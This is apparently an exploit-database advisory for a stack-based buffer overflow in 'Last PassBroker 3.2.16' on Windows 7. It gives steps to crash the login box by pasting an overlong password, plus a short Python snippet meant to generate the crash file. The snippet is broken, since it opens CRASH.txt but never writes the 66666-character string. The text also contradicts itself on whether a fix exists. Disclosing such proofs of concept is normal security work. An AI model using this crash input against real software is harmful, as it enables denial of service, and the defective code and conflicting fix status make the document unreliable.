Last PassBroker 3.2.16 - Stack-Based Buffer Overflow

2015-10-06 19:05:22

# Exploit Title: Last PassBroker Stack-based BOF
# Date: 9/23/2015
# Exploit Author: Un_N0n
# Software Link:
# Version: 3.2.16
# Tested on: Windows 7 x86(32 BIT)

[Steps to Produce the Crash]:
1- open 'LastPassBroker.exe'.
2- A Input-Box will appear asking for Email and Password,
In password field paste in the contents of crash.txt
3- Hit Login.
~Software will Crash.

[Code to produce crash.txt]:
junk = "A"*66666
file = open("CRASH.txt",'w')

> Vendor Notified, Fixed in latest Release.


No fixes

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